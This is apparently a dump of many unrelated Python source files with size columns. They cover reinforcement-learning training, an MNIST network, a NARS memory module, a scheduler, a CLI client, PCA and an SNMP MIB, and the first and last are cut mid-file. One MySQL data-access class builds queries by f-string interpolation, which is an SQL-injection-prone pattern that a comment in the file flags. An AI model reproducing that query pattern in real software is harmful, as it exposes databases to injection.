last_act_v[uid] = tgt_act_net[uid].target_model(last_states_v[uid]) #<----- Actor to train Critic
#Obtaining Q'(s_i+1, a|teta_mu) from critic net Q'
q_last_v[uid] = tgt_crt_net[uid].target_model(last_states_v[uid], last_act_v[uid])
q_last_v[uid][dones_mask[uid]] = 0.0
#Q_target used to train critic net Q'
q_ref_v[uid] = rewards_v[uid].unsqueeze(dim=-1) + q_last_v[uid] * GAMMA
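# Bellman target: y = r + GAMMA * Q'(s', mu'(s')); terminal transitions (dones) contribute only r.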
critic_loss_v[uid] = F.mse_loss(q_v[uid], q_ref_v[uid].detach())
critic_loss_v[uid].backward()
crt_opt[uid].step()
# TRAIN ACTOR
act_opt[uid].zero_grad()
#Obtaining estimated optimal current actions a|theta_mu from actor net and from s_i
cur_actions_v[uid] = act_net[uid](states_v[uid])
#Actor loss = mean{ -Q_i'(s_i, a|theta_mu) }
actor_loss_v[uid] = -crt_net[uid](states_v[uid], cur_actions_v[uid]) #<----- Critic to train Actor
actor_loss_v[uid] = actor_loss_v[uid].mean()
#Find gradient of the loss and backpropagate to perform the updates of theta_mu
actor_loss_v[uid].backward()
act_opt[uid].step()
if frame_idx[uid] % 1 == 0:
tgt_act_net[uid].alpha_sync(alpha=1 - 0.1)
tgt_crt_net[uid].alpha_sync(alpha=1 - 0.1)
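# ptan's alpha_sync blends the weights: target <- alpha*target + (1-alpha)*online,
# so alpha = 0.9 moves each target net 10% toward its online net per update.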
from matplotlib.pyplot import figure
#Plotting all the individual actions
print(env)
figure(figsize=(18, 6))
for uid in buildings:
print(env[uid].buildings[uid].time_step)
plt.plot(env[uid].action_track[uid][2400:2500])
plt.show()
| 8,761 | 3,252 |
import pickle
import sys
from mnist import MNIST
from NeuralNetwork import *
import numpy as np
from PIL import Image
def vectorizeResult(x):
e = np.zeros((10, 1))
e[x] = 1.0
return e
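# e.g. vectorizeResult(3) returns a (10, 1) one-hot column vector with a 1.0 at index 3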
def getImageArray(fileName):
ls = []
for p in np.invert(Image.open(fileName).convert('L')).ravel():
ls.append([p])
return np.array(ls)/255
def createNeuralNetwork(layers, name):
layers = list(map(int, layers))
NN = NeuralNetwork(layers)
data = MNIST('Data')
trainingInput, trainingOutput = data.load_training()
testingInput, testingOutput = data.load_testing()
trainingInput = np.array(trainingInput)/255
testingInput = np.array(testingInput)/255
trainingInput = [np.reshape(x, (layers[0], 1)) for x in trainingInput]
trainingOutput = [vectorizeResult(x) for x in trainingOutput]
trainingData = list(zip(trainingInput, trainingOutput))
testingInput = [np.reshape(x, (layers[0], 1)) for x in testingInput]
testingData = list(zip(testingInput, testingOutput))
NN.stochasticGradientDescent(trainingData, 50, 30, 2.0, testingData)
binaryFile = open(name, mode='wb')
pickle.dump(NN, binaryFile)
binaryFile.close()
if __name__ == "__main__":
if len(sys.argv) != 2:
print("Creating a neural network...")
createNeuralNetwork(sys.argv[1:-1], sys.argv[-1])
print("Done")
else:
fileName = sys.argv[1]
NN = pickle.load(open(fileName, 'rb'))
while True:
numberFile = input("What file would you like to read? ")
if numberFile == '':
break
elif numberFile == 'all':
for i in range(10):
f = str(i) + '.png'
val = np.argmax(NN.propagate(getImageArray(f)))
print("written number: {0}. Network finds a: {1}. {2}".format(i, val, val == i))
else:
numberFile += '.png'
print(np.argmax(NN.propagate(getImageArray(numberFile))))
| 2,041 | 657 |
import json
def pretty_print(text):
"""This utils used for print pretty json"""
print json.dumps(text, indent=2, sort_keys=True)
| 139 | 47 |
import MySQLdb
import sys
sys.path.append('C:/Users/900152/Documents/Dados/TrabalhoPython/JM_exerc')
from model.Back_model import BackEnd
class BackDb:
def __init__(self, conexao):
# An open MySQLdb connection is assumed to be supplied by the caller,
# e.g. conexao = MySQLdb.connect(host=..., user=..., passwd=..., db=...).
self.conexao = conexao
self.cursor = conexao.cursor()
def select_all(self):
comand = 'SELECT * FROM topskills01.02_JM_BackEnd;'
selectcomand = self.cursor.execute(comand)
return selectcomand
def select_by_id(self,id):
comand = f"SELECT * FROM topskills01.02_JM_BackEnd WHERE ID={id}"
idcomand = self.cursor.execute(comand)
return idcomand
def update(self, back: BackEnd):
comand = f"UPDATE topskills01.02_JM_BackEnd SET Nome = '{back.Nome}', Descricao = '{back.Descricao}', Versao = '{back.Versao}' WHERE ID = {back.id}"
updatecomand = self.cursor.execute(comand)
self.conexao.commit()
return updatecomand
def save(self, back: BackEnd):
comand = f"""INSERT INTO topskills01.02_JM_BackEnd
(
Nome
,Descricao
,Versao
)
VALUES(
'{back.Nome}'
,'{back.Descricao}'
,'{back.Versao}'
)"""
savecomand = self.cursor.execute(comand)
return savecomand
def delete(self,id):
comand = f"DELETE FROM topskills01.02_JM_BackEnd WHERE ID={id}"
deletecomand = self.cursor.execute(comand)
return deletecomand
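# Note: building SQL with f-strings as above is vulnerable to SQL injection.
# MySQLdb also supports parameterized queries, e.g.:
# self.cursor.execute("DELETE FROM topskills01.02_JM_BackEnd WHERE ID = %s", (id,))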
| 1,286 | 455 |
# DMaaP Bus Controller interface library | 40 | 9 |
from pynars.Config import Enable
from pynars.NAL.Inference.LocalRules import solve_query, solution_query, solution_question
from pynars.NAL.MetaLevelInference.VariableSubstitution import unification__var_const
from pynars.NARS.DataStructures._py.Link import TaskLink
from pynars.Narsese._py.Sentence import Goal, Judgement, Question
from pynars.Narsese import Statement, Term, Sentence, Budget, Task
from pynars.Narsese._py.Task import Belief, Desire
from .Concept import Concept
from .Bag import Bag
from pynars.NAL.Functions.Tools import revisible
from pynars.NAL.Inference import local__revision
class Memory:
def __init__(self, capacity: int, n_buckets: int = None, take_in_order: bool = False) -> None:
self.concepts = Bag(capacity, n_buckets=n_buckets, take_in_order=take_in_order)
def accept(self, task: Task):
'''
**Accept task**: Accept a task from the `Overall Experience`, and link it from all directly related concepts. Ref: *The Conceptual Design of OpenNARS 3.1.0*.
'''
# merging the new task as a concept into the memory
concept: Concept = Concept._conceptualize(self, task.term, task.budget)
if concept is None: return None # The memory is full. The concept fails to get into the memory.
# then process each task according to its type
task_revised, goal_derived, answers_question, answer_quest = None, None, None, None
if task.is_judgement:
# revised the belief if there has been one, and try to solve question if there has been a corresponding one.
task_revised, answers_question = self._accept_judgement(task, concept)
elif task.is_goal:
task_revised, belief_selected = self._accept_goal(task, concept)
elif task.is_question:
# add the question to the question-table of the concept, and try to find a solution.
answers_question = self._accept_question(task, concept)
elif task.is_quest:
answer_quest = self._accept_quest(task, concept)
else:
raise f"Invalid type {task.sentence.punct}"
# Build the concepts corresponding to the terms of those components within the task.
concept.accept(task, self.concepts, conceptualize=False)
if Enable.temporal_rasoning or Enable.operation:
# if (!task.sentence.isEternal() && !(task.sentence.term instanceof Operation)) {
# globalBuffer.eventInference(task, cont, false); //can be triggered by Buffer itself in the future
# }
raise # TODO
return task_revised, goal_derived, answers_question, answer_quest
def _accept_judgement(self, task: Task, concept: Concept):
''''''
belief_revised = None
answers = None
if Enable.operation: raise # InternalExperienceBuffer.handleOperationFeedback(task, nal);
if Enable.anticipation: raise # ProcessAnticipation.confirmAnticipation(task, concept, nal);
# j1: Judgement = task.sentence
belief: Belief = concept.match_belief(task.sentence)
if belief is not None:
# j2: Judgement = belief.sentence
if revisible(task, belief):
if Enable.temporal_rasoning:
'''
nal.setTheNewStamp(newStamp, oldStamp, nal.time.time());
final Sentence projectedBelief = oldBelief.projection(nal.time.time(), newStamp.getOccurrenceTime(), concept.memory);
if (projectedBelief!=null) {
nal.setCurrentBelief(projectedBelief);
revision(judg, projectedBelief, concept, false, nal);
task.setAchievement(calcTaskAchievement(task.sentence.truth, projectedBelief.truth));
}
'''
raise
belief_revised = local__revision(task, belief) # TODO: handling the stamps
# reduce priority by achieving level
task.reduce_budget_by_achieving_level(belief)
if task.budget.is_above_thresh:
'''final int nnq = concept.questions.size();
for (int i = 0; i < nnq; i++) {
trySolution(judg, concept.questions.get(i), nal, true);
}
final int nng = concept.desires.size();
for (int i = 0; i < nng; i++) {
trySolution(judg, concept.desires.get(i), nal, true);
}'''
concept.add_belief(task)
# try to solve questions
answers = self._solve_judgement(task, concept)
return belief_revised, answers
def _accept_question(self, task: Task, concept: Concept):
''''''
concept.question_table.add(task, 0.5)
if task.is_query:
answers = self._solve_query(task, concept)
else:
answers = self._solve_question(task, concept)
return answers
def _accept_goal(self, task: Task, concept: Concept):
''''''
desire_revised = None
belief_selected = None
if Enable.operation: raise # InternalExperienceBuffer.handleOperationFeedback(task, nal);
if Enable.anticipation: raise # ProcessAnticipation.confirmAnticipation(task, concept, nal);
g1: Goal = task.sentence
desire: Desire = concept.match_desire(g1)
if desire is not None:
g2: Goal = desire.sentence
if revisible(task, desire):
# TODO: Temporal projection
desire_revised = local__revision(task, desire) # TODO: handling the stamps
# reduce priority by achieving level
task.reduce_budget_by_achieving_level(desire)
if task.budget.is_above_thresh:
'''
for (final Task iQuest : concept.quests ) {
trySolution(task.sentence, iQuest, nal, true);
}
if (beliefT != null) {
// check if the Goal is already satisfied (manipulate budget)
trySolution(beliefT.sentence, task, nal, true);
}
'''
# 1. try to solve questions
# 2. try to solve quests
concept.add_desire(task)
return desire_revised, belief_selected
def _accept_quest(self, task: Task, concept: Concept):
''''''
concept.quest_table.add(task, 0.5)
if task.is_query:
answers = self._solve_query(task, concept)
else:
answers = self._solve_quest(task, concept)
return answers
def _solve_judgement(self, belief: Task, concept: Concept):
'''
It should be ensured that the task has no query-variables.
Args:
task (Task): Its sentence should be a judgement.
concept (Concept): The concept corresponding to the task.
'''
answers = []
# 1. try to solve yn-questions
for question in concept.question_table:
answer = solution_question(question, belief)
if answer is not None: answers.append(answer)
# 2. try to solve wh-questions
sub_terms = belief.term.sub_terms
for sub_term in sub_terms:
concept_term: Concept = self.concepts.take_by_key(sub_term, remove=False)
if concept_term is None: continue
task_link: TaskLink
for task_link in concept_term.task_links:
query = task_link.target
if query is None: continue
if not query.is_query: continue
if not query.term.equal(belief.term): continue
answer = solution_query(query, belief)
if answer is not None: answers.append(answer)
return answers
def _solve_question(self, question: Task, concept: Concept):
'''
Args:
task (Task): Its sentence should be a question.
concept (Concept): The concept corresponding to the task.
'''
answers = []
# 1. try to solve yn-questions
belief_answer: Belief = concept.match_belief(question.sentence)
if belief_answer is not None:
answer = solution_question(question, belief_answer)
if answer is not None: answers.append(answer)
return answers
def _solve_query(self, query: Task, concept: Concept):
'''
Args:
task (Task): Its sentence should be a question or a quest and contains query-variable(s).
concept (Concept): The concept corresponding to the task.
'''
answers = []
# 1. try to solve wh-questions
if query.is_question:
sub_terms = query.term.sub_terms
for sub_term in sub_terms:
if sub_term.is_qvar: continue
concept_term: Concept = self.concepts.take_by_key(sub_term, remove=False)
if concept_term is None: continue
task_link: TaskLink
for task_link in concept_term.task_links:
concept_target: Concept = self.concepts.take_by_key(task_link.target.term, False)
if concept_target is None: continue
if not query.term.equal(concept_target.term): continue
subst = unification__var_const(query.term, concept_target.term, [], [])
if not subst.is_qvar_valid: continue
# if not (concept_target.term.equal(query.term) and subst is not None): continue
for belief in concept_target.belief_table:
answer = solution_query(query, belief)
if answer is not None: answers.append(answer)
pass
elif query.is_quest:
pass
else: raise "Invalid case."
return answers
def _solve_goal(self, task: Task, concept: Concept):
'''
Args:
task (Task): Its sentence should be a goal.
concept (Concept): The concept corresponding to the task.
'''
def _solve_quest(self, task: Task, concept: Concept):
'''
Args:
task (Task): Its sentence should be a quest.
concept (Concept): The concept corresponding to the task.
'''
answers = []
return answers
def take(self, remove=True) -> Concept:
'''
Take out a concept according to priority.
'''
return self.concepts.take(remove)
def take_by_key(self, key: Task, remove=True) -> Concept:
return self.concepts.take_by_key(key, remove)
def put(self, concept: Concept):
return self.concepts.put(concept)
def put_back(self, concept: Concept):
return self.concepts.put_back(concept)
def __repr__(self) -> str:
return f"<{self.__class__.__name__}: #items={len(self.concepts)}, #buckets={len(self.concepts.levels)}>"
def __len__(self) -> int:
return len(self.concepts) | 11,206 | 3,124 |
# coding=utf-8
"""实现时间片算法"""
from __future__ import unicode_literals, absolute_import
from fn.fn_loop import LoopContext
from fn.fn_eval import EvalContext
from collections import deque
class TimeSliceEngine(object):
def __init__(self):
# Execution contexts live in this queue; switching always pulls from it,
# and every entry must be callable.
# The container has to be iterable and mutable (finished contexts get evicted).
self.context = deque()
def run(self):
"""运行核心:
只要所有上下文没有为空,那么从上下文中取一个出来
使用具体实现的方法,执行一下
如果上下文 尚未完结,那么从右边塞回去,继续
"""
while self.context:
# Contexts are appended on the right, so pop from the left for FIFO order.
this_context = self.context.popleft()
self.eval_context(this_context)
def eval_context(self, context):
raise NotImplementedError
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
"""所以时间调度本质上就是在退出with块的时候开始执行
"""
self.run()
def for_loop(self, iterable):
ctx = LoopContext(
iterable
)
# append on the right
self.context.append(ctx)
return ctx
def call(self, fn, *args, **kwargs):
ctx = EvalContext(fn, *args, **kwargs)
self.context.append(ctx)
return ctx
class TimeCountEngine(TimeSliceEngine):
"""
按次数分配
函数:需要运行的次数
A:10
B:8
C:4
将会按照运行A 5次,B 5次,C 4次 A 5次,B3次 的顺序将他们执行完
"""
def __init__(self, swith_every=1):
"""
>>>
"""
self.swith_every = swith_every
return super(TimeCountEngine, self).__init__()
def eval_context(self, context):
count = 0
while not context.done():
# run the context one step, then bump the counter
context()
count += 1
# slice quota reached: push the context back and break
if count >= self.swith_every:
self.context.append(context)
break
# otherwise keep executing and counting
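# Illustrative usage (assumes LoopContext/EvalContext advance one step per call
# and report completion via done(), as the engine above expects):
#
# with TimeCountEngine(swith_every=5) as engine:
#     engine.for_loop(range(10))
#     engine.for_loop(range(8))
#
# On leaving the with-block the two loops run interleaved, five steps at a time.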
| 1,861 | 810 |
import re
import xlrd
DATA_BASE_PATH = '../data/population-migration-all/'
def get_files(file_path):
"""get files.
Keyword arguments:
file_path -- file path
"""
result = []
work_book = xlrd.open_workbook(file_path)
first_table = work_book.sheet_by_index(0)
cols = first_table.ncols
title_row = first_table.row_values(0)
source_col_index = title_row.index('来源')
for i in range(first_table.nrows):
row_values = first_table.row_values(i)
if row_values[source_col_index] == '中华人民共和国人口统计资料汇编':
result.append(row_values[cols - 1])
return result
def get_file_content(file_path):
work_book = xlrd.open_workbook(file_path)
table = work_book.sheet_by_index(0)
area = get_area(table.row_values(0, 0, 1)[0])[0]
data_list = []
for i in range(7, table.nrows):
year = table.row_values(i, 0, 1)[0]
if year.isdigit():
data_list.append(table.row_values(i))
return area, data_list
def get_area(line):
return re.findall(r'年(.*?)历年', line, re.U | re.I)
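# e.g. get_area('1990年北京市历年总人口') returns ['北京市'] (the text between '年' and '历年')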
| 1,079 | 428 |
from django.urls import path
from . import views
app_name = "analytics"
urlpatterns = [
path('', views.AnalyticsView.as_view(), name="analytics"),
]
| 156 | 53 |
from _luxem import Reader, to_ascii16, from_ascii16
from luxem.struct import Typed
from luxem.read import load
loads = load
from luxem.write import dump, dumps, Writer
| 168 | 59 |
#!/usr/bin/env python3
from harness import EnginesClient, HttpError
from common import *
engine_client = EnginesClient(
url=url,
user_id=client_user_id,
user_secret=client_user_secret
)
if args.action == 'create':
with open(args.config) as data_file:
config = json.load(data_file)
try:
res = engine_client.create(config)
print_success(res, 'Created new engine: \n')
except HttpError as err:
print_failure(err, 'Error creating new engine\n')
elif args.action == 'update':
engine_id, config = id_and_config()
# print("Engine-id: " + engine_id)
# print("Json config: \n" + str(config))
try:
res = engine_client.update(engine_id=engine_id, import_path=args.import_path, update_type="configs", data=config)
# print_success_string('Updating engine-id: {} \n'.format(engine_id))
print_success(res, 'Updating engine: \n')
except HttpError as err:
print_failure(err, 'Error updating engine-id: {}\n'.format(engine_id))
# with open(args.config) as data_file:
# config = json.load(data_file)
# engine_id = config.engine_id
# try:
# res = engine_client.update(config)
# print_success(res, 'Updating engine: ')
# except HttpError as err:
# print_failure(err, 'Error updating engine\n')
# engine_id, config = id_or_config()
# try:
# res = engine_client.update(engine_id, config, args.delete, args.force, args.input)
# print_success(res, 'Updating existing engine. Success:\n')
# except HttpError as err:
# print_failure(err, 'Error updating engine.')
elif args.action == 'import':
engine_id = args.engine_id
# print("Import path: {}".format(args.import_path))
try:
res = engine_client.update(engine_id=engine_id, import_path=args.import_path, update_type="imports", data={})
print_success(res, 'Importing to engine: {}\n'.format(engine_id))
except HttpError as err:
print_failure(err, 'Error importing to engine-id: {} from {}\n'.format(engine_id, args.import_path))
# else:
# print_failure(None, "Error: no input for import command.")
elif args.action == 'train':
engine_id = args.engine_id
# print("Import path: {}".format(args.import_path))
try:
res = engine_client.update(engine_id=engine_id, import_path=args.import_path, update_type="jobs", data={})
print_success(res, 'Asking engine: {} to train\n'.format(engine_id))
except HttpError as err:
print_failure(err, 'Error requesting engine: {} to train\n'.format(engine_id))
# else:
# print_failure(None, "Error: no input for import command.")
elif args.action == 'delete':
engine_id, config = id_or_config()
try:
res = engine_client.delete(engine_id=engine_id)
print_success_string('Deleted engine-id: {} \n'.format(engine_id))
except HttpError as err:
print_failure(err, 'Error deleting engine-id: {}\n'.format(engine_id))
elif args.action == 'status':
engine_id = args.engineid
try:
if engine_id is not None:
res = engine_client.get(engine_id=engine_id)
# print(str(res))
print_success(res, 'Status for engine-id: {}\n'.format(engine_id))
else:
res = engine_client.get(engine_id=None)
# print(str(res))
print_success(res, 'Status for all Engines:\n')
except HttpError as err:
print_failure(err, 'Error getting status.\n')
else:
print_warning("Unknown action: %{}".format(args.action))
| 3,635 | 1,154 |
# Author: Thomas Dorfer <thomas.a.dorfer@gmail.com>
import warnings
import numpy as np
from sklearn.decomposition import PCA
def pca(X, *, thres=.9, whiten=False):
"""Principal component analysis.
PCA is defined as an orthogonal linear transformation that transforms the
data to a new coordinate system such that the greatest variance by some
scalar projection of the data comes to lie on the first coordinate (called
the first principal component), the second greatest variance on the second
coordinate, and so on.
Parameters
----------
X : ndarray of shape (n_samples, n_features_pre)
Feature matrix.
thres : float, default=.9
Fraction of the total variance that the retained components should explain.
whiten : bool, default=False
If True, the returned components are whitened to have unit component-wise variance.
Returns
-------
arr : ndarray of shape (n_samples, n_features_post)
Array containing the PCA components comprising the specified variance.
Notes
-----
For the output to be meaningful, the number of samples should be larger than
the number of features.
Examples
--------
>>> from protlearn.dimreduction import pca
>>> features.shape #from a larger dataset (not shown here)
(1000, 575)
>>> reduced = pca(features, thres=.9)
>>> reduced.shape
(1000, 32)
"""
# check input dimensionality
if X.shape[0] < X.shape[1]:
warnings.warn("The number of samples (%i) is less than the number of "
"features (%i). Therefore, the PCA output may not be "
"meaningful." % (X.shape[0], X.shape[1]))
# fit and transform PCA
pca = PCA(whiten=whiten).fit(X)
var = pca.explained_variance_ratio_[0]
comp = 1
while var <= thres:
var += pca.explained_variance_ratio_[comp]
comp += 1
arr = pca.transform(X)
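# Keep only the leading components whose cumulative explained variance first exceeds `thres`.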
return arr[:,:comp] | 1,817 | 558 |
#
# PySNMP MIB module CISCO-VOICE-COMMON-DIAL-CONTROL-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/CISCO-VOICE-COMMON-DIAL-CONTROL-MIB
# Produced by pysmi-0.3.4 at Wed May 1 11:51:02 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, OctetString, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "Integer", "OctetString", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
SingleValueConstraint, ConstraintsIntersection, ValueRangeConstraint, ConstraintsUnion, ValueSizeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ConstraintsIntersection", "ValueRangeConstraint", "ConstraintsUnion", "ValueSizeConstraint")
cCallHistoryIndex, = mibBuilder.importSymbols("CISCO-DIAL-CONTROL-MIB", "cCallHistoryIndex")
ciscoExperiment, = mibBuilder.importSymbols("CISCO-SMI", "ciscoExperiment")
callActiveSetupTime, callActiveIndex = mibBuilder.importSymbols("DIAL-CONTROL-MIB", "callActiveSetupTime", "callActiveIndex")
SnmpAdminString, = mibBuilder.importSymbols("SNMP-FRAMEWORK-MIB", "SnmpAdminString")
ModuleCompliance, NotificationGroup, ObjectGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup", "ObjectGroup")
Gauge32, TimeTicks, MibIdentifier, Integer32, Bits, Unsigned32, ObjectIdentity, ModuleIdentity, Counter32, MibScalar, MibTable, MibTableRow, MibTableColumn, NotificationType, Counter64, IpAddress, iso = mibBuilder.importSymbols("SNMPv2-SMI", "Gauge32", "TimeTicks", "MibIdentifier", "Integer32", "Bits", "Unsigned32", "ObjectIdentity", "ModuleIdentity", "Counter32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "NotificationType", "Counter64", "IpAddress", "iso")
DisplayString, TextualConvention, TruthValue = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention", "TruthValue")
ciscoVoiceCommonDialControlMIB = ModuleIdentity((1, 3, 6, 1, 4, 1, 9, 10, 55))
ciscoVoiceCommonDialControlMIB.setRevisions(('2010-06-30 00:00', '2009-03-18 00:00', '2008-07-02 00:00', '2007-06-26 00:00', '2005-08-16 00:00', '2005-03-06 00:00', '2003-03-11 00:00', '2001-10-06 00:00', '2001-09-05 00:00', '2000-07-22 00:00',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: ciscoVoiceCommonDialControlMIB.setRevisionsDescriptions(('Added CvcCallReferenceIdOrZero textual convention. Added aaclc and aacld enum to CvcCoderTypeRate and CvcSpeechCoderRate textual conventions.', '[1] Added acronym for iSAC codec [2] Added iSAC enum to CvcSpeechCoderRate and CvcCoderTypeRate textual conventions.', "[1] Added '-- obsolete' to description of 'g722' enum from CvcCoderTypeRate. [2] Added new enum values 'g722r4800', 'g722r5600' and 'g722r6400' to CvcCoderTypeRate. [3] Added new enum values 'g722r4800', 'g722r5600' and 'g722r6400' to CvcSpeechCoderRate.", '[1] Imported TEXTUAL-CONVENTION from SNMPv2-TC. [2] Added acronyms for GSM AMR-NB and iLBC codecs [3] Added llcc, gsmAmrNb, iLBC, iLBCr15200 and iLBCr13330 enums to CvcSpeechCoderRate textual conventions. [4] Added llcc, gsmAmrNb, g722, iLBC, iLBCr15200 and iLBCr13330 enums to CvcCoderTypeRate textual conventions. [5] Added REFERENCE clause to CvcSpeechCoderRate and CvcCoderTypeRate textual conventions for GSM AMR-NB and iLBC codecs.', 'Added CvcH320CallType and CvcVideoCoderRate objects. Added g722 enum to CvcCoderTypeRate textual conventions.', 'Added gsmAmrNb enum to CvcSpeechCoderRate and CvcCoderTypeRate textual conventions.', "Added new enum value 'llcc', to CvcSpeechCoderRate and CvcCoderTypeRate textual-conventions.", "[1] Added new enum value 'g726r40000',to CvcSpeechCoderRate's and CvcCoderTypeRate's textual-conventions. [2] Replaced 'clearch' enum with 'clearChannel' enum. [3] Replaced 'codec is disabled' comment for clearChannel enum with 'CLEAR channel codec'.", "[1] Added new enum value, 'clearch,' to CvcSpeechCoderRate's and CvcCoderTypeRate's textual-conventions. [2] Added new enum value, 'gr303,' to CvcInBandSignaling's textual-conventions [3] Modified cvCommonDcCallActiveInBandSignaling's and cvCommonDcCallHistoryInBandSignaling's description to indicate value is valid only for Connection Trunk calls.", 'Add new objects for handling the following features: [1] Calling Name display for call active and history table. [2] Caller ID Block, which indicates whether the Caller ID feature is in using, for call active and history table.',))
if mibBuilder.loadTexts: ciscoVoiceCommonDialControlMIB.setLastUpdated('201006300000Z')
if mibBuilder.loadTexts: ciscoVoiceCommonDialControlMIB.setOrganization('Cisco Systems, Inc.')
if mibBuilder.loadTexts: ciscoVoiceCommonDialControlMIB.setContactInfo('Cisco Systems Customer Service Postal: 170 W. Tasman Drive San Jose, CA 95134 USA Tel: +1 800 553-NETS E-mail: cs-voice@cisco.com')
if mibBuilder.loadTexts: ciscoVoiceCommonDialControlMIB.setDescription('This MIB module contains voice related objects that are common across more than one network encapsulation i.e VoIP, VoATM and VoFR. *** ABBREVIATIONS, ACRONYMS AND SYMBOLS *** GSM - Global System for Mobile Communication AMR-NB - Adaptive Multi Rate - Narrow Band iLBC - internet Low Bitrate Codec iSAC - internet Speech Audio Codec')
cvCommonDcMIBObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 10, 55, 1))
cvCommonDcCallActive = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 10, 55, 1, 1))
cvCommonDcCallHistory = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 10, 55, 1, 2))
class CvcSpeechCoderRate(TextualConvention, Integer32):
reference = '[1] RFC 3267: For introduction about GSM AMR-NB codec, section 3.1 [2] RFC 3952: For introduction about iLBC codec, section 2'
description = 'This object specifies the most desirable codec of speech for the VoIP, VoATM or VoFR peer. g729r8000 - pre-IETF G.729 8000 bps g729Ar8000 - G.729 ANNEX-A 8000 bps g726r16000 - G.726 16000 bps g726r24000 - G.726 24000 bps g726r32000 - G.726 32000 bps g711ulawr64000 - G.711 u-Law 64000 bps g711Alawr64000 - G.711 A-Law 64000 bps g728r16000 - G.728 16000 bps g723r6300 - G.723.1 6300 bps g723r5300 - G.723.1 5300 bps gsmr13200 - GSM Full rate 13200 bps g729Br8000 - G.729 ANNEX-B 8000 bps g729ABr8000 - G.729 ANNEX-A & B 8000 bps g723Ar6300 - G723.1 Annex A 6300 bps g723Ar5300 - G723.1 Annex A 5300 bps g729IETFr8000 - IETF G.729 8000 bps gsmeEr12200 - GSM Enhanced Full Rate 12200 bps clearChannel - CLEAR Channel codec g726r40000 - G.726 40000 bps llcc - Lossless compression codec gsmAmrNb - GSM AMR-NB 4750 - 12200 bps iLBC - iILBC 13330 or 15200 bps iLBCr15200 - iLBC 15200 bps iLBCr13330 - iLBC 13330 bps g722r4800 - G.722 (modes 1, 2, 3) g722r5600 - G.722 (modes 1, 2) g722r6400 - G.722 (mode 1) iSAC - iSAC (10 to 32 kbps) aaclc - AAC-LC Advanced Audio Coding Low Complexity aacld - AAC-LD MPEG-4 Low Delay Audio Coder'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30))
namedValues = NamedValues(("g729r8000", 1), ("g729Ar8000", 2), ("g726r16000", 3), ("g726r24000", 4), ("g726r32000", 5), ("g711ulawr64000", 6), ("g711Alawr64000", 7), ("g728r16000", 8), ("g723r6300", 9), ("g723r5300", 10), ("gsmr13200", 11), ("g729Br8000", 12), ("g729ABr8000", 13), ("g723Ar6300", 14), ("g723Ar5300", 15), ("g729IETFr8000", 16), ("gsmeEr12200", 17), ("clearChannel", 18), ("g726r40000", 19), ("llcc", 20), ("gsmAmrNb", 21), ("iLBC", 22), ("iLBCr15200", 23), ("iLBCr13330", 24), ("g722r4800", 25), ("g722r5600", 26), ("g722r6400", 27), ("iSAC", 28), ("aaclc", 29), ("aacld", 30))
class CvcFaxTransmitRate(TextualConvention, Integer32):
description = "This object specifies the default transmit rate of FAX for the VoIP, VoATM or VOFR peer. If the value of this object is 'none', then the Fax relay feature is disabled ; otherwise the Fax relay feature is enabled. none - Fax relay is disabled. voiceRate - the fastest possible fax rate not exceed the configured voice rate. fax2400 - 2400 bps FAX transmit rate. fax4800 - 4800 bps FAX transmit rate. fax7200 - 7200 bps FAX transmit rate. fax9600 - 9600 bps FAX transmit rate. fax14400 - 14400 bps FAX transmit rate. fax12000 - 12000 bps FAX transmit rate."
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8))
namedValues = NamedValues(("none", 1), ("voiceRate", 2), ("fax2400", 3), ("fax4800", 4), ("fax7200", 5), ("fax9600", 6), ("fax14400", 7), ("fax12000", 8))
class CvcCoderTypeRate(TextualConvention, Integer32):
reference = '[1] RFC 3267: For introduction about GSM AMR-NB codec, section 3.1 [2] RFC 3952: For introduction about iLBC codec, section 2'
description = 'Represents the coder type-rate for voice/fax compression used during a call. *** ABBREVIATIONS, ACRONYMS AND SYMBOLS *** GSM - Global System for Mobile Communication AMR-NB - Adaptive Multi Rate - Narrow Band iLBC - internet Low Bitrate Codec iSAC - internet Speech Audio Codec other - none of the following. fax2400 - FAX 2400 bps fax4800 - FAX 4800 bps fax7200 - FAX 7200 bps fax9600 - FAX 9600 bps fax14400 - FAX 14400 bps fax12000 - FAX 12000 bps g729r8000 - G.729 8000 bps (pre-IETF bit ordering) g729Ar8000 - G.729 ANNEX-A 8000 bps g726r16000 - G.726 16000 bps g726r24000 - G.726 24000 bps g726r32000 - G.726 32000 bps g711ulawr64000 - G.711 u-Law 64000 bps g711Alawr64000 - G.711 A-Law 64000 bps g728r16000 - G.728 16000 bps g723r6300 - G.723.1 6300 bps g723r5300 - G.723.1 5300 bps gsmr13200 - GSM full rate 13200 bps g729Br8000 - G.729 ANNEX-B 8000 bps g729ABr8000 - G.729 ANNEX-A & B 8000 bps g723Ar6300 - G723.1 Annex A 6300 bps g723Ar5300 - G723.1 Annex A 5300 bps ietfg729r8000 - G.729 8000 bps (IETF bit ordering) gsmeEr12200 - GSM Enhanced Full Rate 12200 bps clearChannel - CLEAR channel codec g726r40000 - G.726 40000 bps llcc - Lossless compression codec gsmAmrNb - GSM AMR-NB 4750 - 12200 bps g722 - G.722 2400 - 6400 bps iLBC - iILBC 13330 or 15200 bps iLBCr15200 - iLBC 15200 bps iLBCr13330 - iLBC 13330 bps g722r4800 - G.722 